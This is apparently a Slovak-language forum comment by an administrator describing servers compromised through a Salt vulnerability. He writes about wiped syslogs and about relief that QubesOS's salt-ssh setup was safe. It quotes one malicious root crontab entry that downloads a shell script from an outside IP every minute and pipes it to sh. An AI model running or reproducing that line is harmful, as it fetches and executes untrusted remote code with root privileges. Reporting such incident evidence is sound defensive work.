Ta zranitelnost Saltu je uz hojne vyuzivana. Jeden Salt server som zaplatoval az dnes ???? ale uplne zbytocne, lebo desiatky serverov na danom projekte uz su napadnute.
Napr do root crontabu pribudlo:
* * * * * wget -q -O - http://54.36.185.99/c.sh | sh > /dev/null 2>&1
A to bol jeden z amaterskejsich utocnikov. Dalsich som uz ani nehladal, lebo samozrejme su vymazane syslogy atd.
Zarobil som si na minimalne cely den prace uplne zbytocne.
@Vít Šesták, pretoze neviem kto to tu este pouziva - najprv ma zamrazilo, ci sa to tyka aj QubesOS, to uz by bol iny level problemu. Samozrejme je to safe (salt-ssh cez qrexec a este aj cez management_dispvm), ale pocit to nebol dobry.